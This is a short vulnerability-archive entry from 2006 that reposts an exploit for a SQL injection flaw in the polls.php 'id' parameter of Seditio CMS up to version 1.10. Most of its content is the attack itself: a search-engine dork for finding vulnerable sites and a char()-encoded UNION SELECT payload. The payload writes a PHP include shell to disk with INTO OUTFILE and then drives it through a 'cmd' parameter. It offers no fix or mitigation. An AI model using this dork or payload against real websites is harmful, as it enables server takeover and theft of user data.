Seditio <= 1.10 (pollid) Remote SQL Injection Vulnerability

2006-12-01T00:00:00
ID SECURITYVULNS:DOC:15269
Type securityvulns
Reporter Securityvulns
Modified 2006-12-01T00:00:00

Description


Title : Seditio <= 1.10 (pollid) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

Dork : "Powered by Seditio"


[[SQL]]]------------------------------------------------------

http://[target]/[path]/polls.php?id=

Example:

// polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%20'[path]/.php'/*

.php?cmd=[shell] """""""""""""""""""""

ajann,Turkey

...

Im not Hacker!